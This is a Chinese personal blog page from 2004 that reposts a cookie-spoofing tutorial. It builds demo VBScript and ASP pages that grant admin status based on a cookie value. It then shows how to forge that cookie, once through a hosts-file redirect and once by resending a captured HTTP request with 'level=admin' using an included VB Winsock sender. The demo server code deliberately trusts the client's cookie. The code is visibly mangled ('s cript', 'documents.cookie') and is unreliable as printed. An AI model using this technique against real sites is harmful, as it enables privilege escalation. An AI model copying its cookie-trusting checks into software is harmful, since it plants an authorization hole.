5D艺术网首页
商城
|
资讯
|
作品
|
博客
|
教程
|
论坛
登录
注册
加为好友
发短消息
来自:河北
性别:先生
最后登录:2013-04-14
http://hbwazxf.5d.cn/
曾经有一个漂亮女孩追我的机会摆在我的面前,我没有去珍惜,只到现在我已经结婚了,我才后悔不已。人世间最痛苦的事莫过于此,如果上天再给我一个重新来过的机会,我会对那个女孩说几个字:"放弃我吧!"如果非要在这个选择前加一个期限,我希望是"来世再说!" "咋了哥们?"唉!被人煮了……这就是我的BLOG,欢迎大家参观访问,大家交个朋友!QQ:77356614 mail:waxz33#sohu.com
首页
|
新闻
|
话题
|
博客
|
相册
|
艺术作品
|
社交关系
|
留言板
|
社交圈
2004/10/29 | czy的cookie欺骗教程
类别(软件破解及黑客技术)
|
评论
(0)
|
阅读(74)
|
发表于 12:13
czy的cookie欺骗教程
来源:黑客基地 编辑:古典辣M°
_title>czy的cookie欺骗教程
_content>---------产生一个COOKIE文件并改变它
唉,很早就想点关于COOKIE的东东了,主要是网上有不少文章说半天其实也
没有多少实质的东西。
首先大家明白什么是COOKIE,具体点说如果是98那么它们默认存放在C:\windows\cookies
目录下,如果是2k它们在C:\Documents and Settings\%你的用户名%\Cookies目录下(每个文件都不会超过4KB)
它们的文件名格式为:你的用户名@产生的COOKIE的网页文件所在的WEB目录[COOKIE改变的次数].txt
具体的例子:iwam_system@cookie[3].txt
再来看一看一个最简单的COOKIE文件的内容:
level
admin
www.locking.8u8.com/cookie/
0
1331699712
29536653
4044081984
29528196
*
最前面的两段为服务器产生的COOKIE内容(level和admin)第三段为产生这个COOKIE文件的网站的域名和WEB目录
这儿就要注意了没有记录产生COOKIE文件的文件名!所以在同一个目录下不同文件产生的COOKIE是同一个文件只是每
产生一次COOKIE的文件名的中括号里的数字就要加1,后面的那些就不管它了我也不懂哈:)
再来看看如何生成一个COOKIE我以vbs cript为例:
<s cript language=vbs>
documents.cookie="level" & "=" & "user" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
msgbox documents.cookie
</s cript>
这儿我们特别人注意的是最后一段 ";expires=Monday, 01-Jan-03 12:00:00 GMT"这是用来说明产生的COOKIE文件的
有效时间的,如果没有那么这个COOKIE你将不会在本文开头所说的目录里找到它。这个例子中有效时间是2003年当然你
也就能在本地硬盘上找到它们了。
另外当用documents.cookie来得到COOKIE内容时设置COOKIE有效时间这一段将被忽略(当然这也方便了网站的COOKIE
*作)比如说上面将弹出一个内容为 level=user的对话框
好了现在我们来实战一下:
我的网站叫www.locking.8u8.com在它的COOKIE目录里有两个文件一个是admin1.htm内容就是上面的例子
还有一个文件叫level1.htm内容如下:
<s cript language=vbs>
co=documents.cookie
le=mid(co,instr(co,"=")+1,len(co)-instr(co,"=")+1)
if le="user" then
msgbox "you are a user"
else
if le="admin" then
msgbox "you are a administrator"
else
msgbox "you not login"
end if
end if
</s cript>
当你先浏览admin1.htm后再浏览level1.htm时将弹出一个对话框内容为:"you are a user",当你没有浏览过
admin1.htm而直接浏览level1.htm将说 "you not login" (注意有的人可能会先浏览admin1.htm后再直接在硬盘
上更改COOKIE的内容当然这样是不行的)
好了我们的目标就是让我们能在浏览level1时弹个框框说 "you are a administrator" :)
办法只有两个咯:1)把8u8黑了,然后找到那个level1.htm改了不就可以了不过本篇文章不做讨论哈
2)进行COOKIE欺骗,OK LET GO:)
-----------------------------------(我的系统环境一台2kserver+iis5)
第一步:自已做一个文件名叫admin2.htm吧内容如下
<s cript language=vbs>
documents.cookie="level" & "=" & "admin" & ";expires=Monday, 01-Jan-03 12:00:00 GMT"
</s cript>
然后把它放入一个名叫COOKIE的可浏览目录中(COOKIE要位于根目录)
第二步:找到位于C:\WINNT\system32\drivers\etc下的hosts文件在它的后面加上如下一段:
127.0.0.1
www.locking.8u8.com
第三步:仿问www.locking.8u8.com/cookie/admin2.htm(这儿实际是仿问的本机的文件)
第四步:删除hosts中刚才我们添加的内容然后再清掉IE的历史记录
第五步:让我们再次仿问www.locking.8u8.com/cookie/level1.htm
怎么样我们现在是 administrator了吧(注意仿问网站是一定要在前面加三个w)
在上一节中我所举的例子是一个存活期很长的COOKIE,对于这种
COOKIE他会生成在我们的本地盘上的,而对于那些关闭浏览器就失效
的COOKIE我们该怎样来进行欺骗伪造呢?
首先我们应该知道在我第一节的例子中弹那个"you are a administrator"
框框的网页(level1.htm)其实是下载在我的本地然后执行的,也就是说
他对COOKIE的检验读取也是在本地,那如果是在远程服务器上呢?比如
一个ASP程序他又是如何读取我们的COOKIE的呢?
先来看看基本的东东吧:当我们使用HTTP协议向远程主机发送一个
GET或是POST请求时,那么如果有这个域名的COOKIE存在(不管是在内存中
还是本地盘上的)都将和请求一起发送到服务器去.
下面的就是一个实际的例子:
GET /ring/admin.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
看到最后一行了吧:)
然后我们再来看看服务器是如何进行COOKIE检验的,我举了一个简单的例子:
有两个ASP文件一个叫admin.asp,还有一个叫level.asp
-----------admin.asp------------------
<%response.write now()%>
<%response.write "<br>"%>
<%response.cookies("level")="user"%>
<%response.write "<html><s cript>document.write(documents.cookie);</s cript></html>"%>
-----------cut here-------------------
-----------level.asp------------------
<%
if Request.Cookies("level")<>"" then
response.write "<html><s cript>document.write(documents.cookie);</s cript></html>"
if request.cookies("level")="user" then
response.write "<html><s cript>alert('you are a user');</s cript></html>"
else
if request.cookies("level")="admin" then
response.write "<html><s cript>alert('you are administrator!');</s cript></html>"
set fso1=server.createobject("s cripting.filesystemobject")
set fil=fso1.opentextfile("d:\sms\ring\a.txt",8,true)
fil.writeline "you are admin!"
end if
end if
else
response.write "<html><s cript>alert('you are not login');</s cript></html>"
end if
%>
-----------cut here-------------------
说明:当你请求admin.asp时,将产生一个临时的COOKIE(你关闭浏览器就会失效),然后我们不关闭浏览器而
请求level.asp时它就会用request.cookies来提取你发出的请求里面的cookie,如果你的COOKIE里面的内容是
admin的话那么它将用fso对象在服务器产生一个记录文件(a.txt要注意的是我们在实验时要把目录设为可写)
好了就介绍这么多吧,我们的目的就是让服务器产生a.txt并写入内容"you are admin"还是进行上一节的
域名欺骗吗?不是让我们写一个winsocket程序吧,Let G)
下面是我们VB+WINSCOKET控件写的一个简单的例子的源代码:
-----------------------COOKIE SEND---------------------------------------
Private Sub Command1_Click()
Winsock1.RemotePort = Text3.Text '远程主机打开的端口一般都为80
Winsock1.RemoteHost = Text2.Text '远程主机的域名也可以输IP
Winsock1.Connect '打开一个SOCKET连接
Command1.Enabled = False '一次只能打开一个连接所以要让SEND按钮失效
End Sub
Private Sub winsock1_Connect()
Winsock1.SendData Text1.Text '打开连接成功的话就发送数据
End Sub
Private Sub Command2_Click()
Winsock1.Close
Command1.Enabled = True '关闭连接,让SEND按钮有效
End Sub
Private Sub winsock1_DataArrival(ByVal bytesTotal As Long) '接收数据,可以让我们检查数据是否发送成功
Dim tmpstr As String
Winsock1.GetData tmpstr
Text4.Text = tmpstr
End Sub
-----------------------CUT HERE--------------------------------------------
好,再让我们看一看具体的过程吧:这儿要用到一个不错的程序WinSock Expert v0.3 beta 1
一步:打开一个IE然后再打开winsock expert选择监视刚才打开的IE窗口的数据包
二步: 在IE地址栏输http://61.139.xx.xx/ring/admin.asp,那个我将看到发出了如下数据
GET /ring/admin.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
不要半闭窗口请http://61.139.xx.xx/ring/level.asp,我们又将看到发出了如下数据
GET /ring/level.asp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 61.139.xx.xx
Connection: Keep-Alive
Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
三步: 好了对第二次发出的数据的最后一行Cookie: level=user; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就是我们要改的东东,由于level.asp中相应的COOKIE的检验语句为if request.cookies("level")="admin" then
所以我们只要把上面的数据的最后一行改成Cookie: level=admin; ASPSESSIONIDSSTCRACS=ODMLKJMCOCJMNJIEDFLELACM
就可以了,后面的东东很重要下面我再说明一下:)
四步: 把改过的数据拷到我编的程序的发送框里面输入端口和域名后。。。。。
五步:到服务器看看是不是生成了那个a.txt里面的内容为"you are admin!
好了不写了,主要还是自已多实验就可以了为了放便大家本文章的程序代码完全公开哈
1.admin.asp和level.asp:
locking.8u8.com/cookie/admin.txt和level.txt
2.cookieclient.exe及源代码:
locking.8u8.com/cookie/cookiesend.zip
3.winsock expert:
software.tom.com/download.asp?id=7500
或是
dxqsoft.myrice.com
/
0
评论
Comments
日志分类
首页
[651]
生活杂事
[65]
FLASH
[55]
电脑维修经验_软件技巧
[273]
网页制作
[5]
编程宝典
[15]
软件破解及黑客技术
[97]
摄影摄像相关
[73]
个人作品
[17]
LINUX专栏
[46]
健康保典
[2]
玩彩票
[3]
数据恢复
[0]